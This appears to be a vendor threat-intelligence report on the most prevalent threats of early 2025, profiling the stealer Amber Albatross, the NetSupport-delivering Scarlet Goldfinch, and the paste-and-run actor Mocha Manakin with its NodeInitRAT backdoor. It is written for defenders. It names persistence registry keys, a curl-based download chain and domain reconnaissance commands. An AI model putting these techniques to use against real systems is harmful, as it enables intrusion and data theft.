Midyear threats
Red Canary-named “color birds” accounted for half the top 10 threats we detected in the first half of 2025.
Our most prevalent threats from the first half of 2025 will come as no surprise to regular readers of our monthly Intelligence Insights. However, it’s fascinating to see that Red Canary-named threats account for half of the top 10, which includes stealers, remote management and monitoring (RMM) tools, ransomware precursors, and more.
Top 10 threats detected in the first half of 2025
We’ll briefly analyze the emergent threats in this list, examining what they do and why they’re concerning. We’ll also link to additional resources that security professionals can leverage to improve their defenses.
We’ll focus only on the Red Canary-named threats. Although the Red Canary-named threat Infrared Ibis made our top 10 for the first half of the year, it encompassed a limited campaign of compromised Google Chrome extensions, and consequently a short-lived campaign. Infrared Ibis is the collective name for the compromised version of Cyberhaven Chrome extension version 24.10.4 and additional Chrome extensions dating back to May 2024 identified by Secure Annex research.
You can find extensive information about the rest of the top 10 on the following Threat Detection Report pages:
It’s fascinating to see that Red Canary-named threats account for half of the top 10, which includes stealers, droppers, remote management and monitoring (RMM) tools, ransomware precursors, and more.
Amber Albatross is an activity cluster that we first detected in January 2024. In the first half of 2025, Red Canary identified two installation paths currently in use: one via the potentially unwanted program (PUP) PC App Store, and a second via a masquerading utility tool such as Let’s Compress, Zip It Now, or PDFast. The activity cluster downloads and installs a PyInstaller executable with stealer-like capabilities via multiple stages of Windows Command Shell commands, PowerShell, and custom executables. The extracted Python code is protected with Pyarmor, complicating analysis.
Amber Albatross performs a variety of reconnaissance tasks that are consistent with stealer malware, including the following:
- uses WMIC to detect if a hypervisor is present on the endpoint
- enumerates the manufacturer, model, and list of Windows software updates
- checks for installed antivirus and firewall products
- looks for a wide range of browsers and their development versions, including Edge, Firefox, Chrome, Chromium, Avast Browser, and Brave
- attempts to access browser profiles or user data folders and checks specific registry keys for managed browsers (e.g.,
HKLM:\SOFTWARE\Policies\Google\Chrome\CloudManagementEnrollmentTokenfor Chrome)
Defenders should prioritize developing detection coverage and preventive controls for Amber Albatross for the following reasons:
- Its stealer-like capabilities could lead to the theft of credentials and sensitive data.
- Its use of anti-analysis techniques and obfuscation make it difficult to analyze and detect, allowing it to operate inconspicuously and persist.
- Its prevalence across our detection dataset suggests that most organizations are potentially susceptible to Amber Albatross infection.
- While PUPs may be considered lower priority by some teams, Amber Albatross’s use of PC App Store is a good example of how PUPs can serve as an initial access vector for more severe threats.
The following resources include detection and preventive guidance for Amber Albatross:
Scarlet Goldfinch is an initial access threat we first detected in June 2023. It primarily delivers NetSupport Manager, a popular RMM tool, as its follow-on payload, but it has also delivered LummaC2 as a tertiary payload.
Scarlet Goldfinch uses compromised websites to present lures to visitors in hopes of tricking them into downloading and executing malicious code. Historically, Scarlet Goldfinch used fake browser update lures very similar to the classic SocGholish fake update lures. While the style of these lures changed over time, the general theme of a fake update remained through March 2025.
In April 2025, Scarlet Goldfinch made a major change, dropping the fake updates JS scheme in favor of the fake CAPTCHA paste-and-run lures that have taken the initial access world by storm. Despite this shift in TTPs, the end goal of installing NetSupport Manager as the RAT payload of choice has remained the same.
Throughout the first half of 2025, Scarlet Goldfinch paste-and-run lures consistently leveraged curl to pull down a BAT script (disguised as a PHP file on a C2 server) that then used curl to download and PowerShell to extract a ZIP file to install NetSupport Manager.
Over time, Scarlet Goldfinch added character obfuscation to the command-line execution, as well as other defense evasion techniques like using the conhost LOLBAS to spawn a chain of multiple nested cmd.exe processes prior to curl execution.
Scarlet Goldfinch establishes persistence for the NetSupport payload using scheduled tasks and Windows Registry Run keys (e.g., HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Support11, HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\progcs1)
Defenders should prioritize developing detection coverage and preventive controls for Scarlet Goldfinch for the following reasons:
- Scarlet Goldfinch installs NetSupport Manager, providing adversaries with persistent remote control over victim systems, allowing for unauthorized access and further infection, including the delivery of additional malware.
- Adversaries use legitimate RMM tools like NetSupport Manager because they can operate with the veneer of legitimacy, helping them blend into the environment. RMM abuse can evade detection because many organizations use these tools for legitimate IT purposes, making it harder to differentiate malicious use from normal activity.
- Adversaries are actively supporting and developing Scarlet Goldfinch, requiring defenders to continuously analyze the threat and tune their security controls accordingly.
- Scarlet Goldfinch has been a prevalent threat for a long time and exists within the threat model of most organizations.
The following resources include detection and preventive guidance for Scarlet Goldfinch:
We first detected Mocha Manakin and its payload of choice, the Red Canary-named backdoor NodeInitRAT, in January 2025. Mocha Manakin, similar to Scarlet Goldfinch, uses the paste-and-run technique (aka ClickFix, fakeCAPTCHA) for initial access. Following initial access, Mocha Manakin leverages PowerShell to deliver a NodeJS backdoor called NodeInitRat that allows adversaries to establish persistence and perform reconnaissance.
Concerningly, Mocha Manakin activity overlaps with Interlock ransomware operations, in that both threats leverage paste and run, NodeInitRAT, and shared infrastructure.
Additionally, NodeInitRAT has the following capabilities:
- establishes persistence on the system using Windows Registry run keys, often named
ChromeUpdater - performs system and domain reconnaissance, including enumerating principal names, gathering general domain details, detecting local network neighbors with
arp.exe -a, listing services withGet-Service, and checking the current user’s privilege level - communicates with adversary-controlled servers over HTTP, frequently using Cloudflare tunnels as intermediary infrastructure
- allows for arbitrary command execution, including executing
nltest,net.exe, andsetspn.exeto gather information on domain controllers and domain trusts, and enumerate Service Principal Names - deploys additional EXE, DLL, and JS payloads on compromised systems, with JS files sometimes renamed with
.logextensions - uses XOR encoding and GZIP compression to minimize data transfer and evade inspection
Here’s what NodeInitRAT looks like in the node.exe command line:
- Given overlaps with Interlock, unmitigated Mocha Manakin activity could lead to ransomware.
- The paste-and-run initial access technique has proven highly effective for numerous threats.
- The threat establishes persistence and provides adversaries with remote access and the ability to execute arbitrary commands and deploy additional payloads, granting them significant control over compromised systems.
- The reconnaissance capabilities of NodeInitRAT can lead to the collection of sensitive system and domain information, which can be leveraged for further, more targeted attacks or data exfiltration.
The following resources include detection and preventive guidance for Mocha Manakin and NodeInitRAT: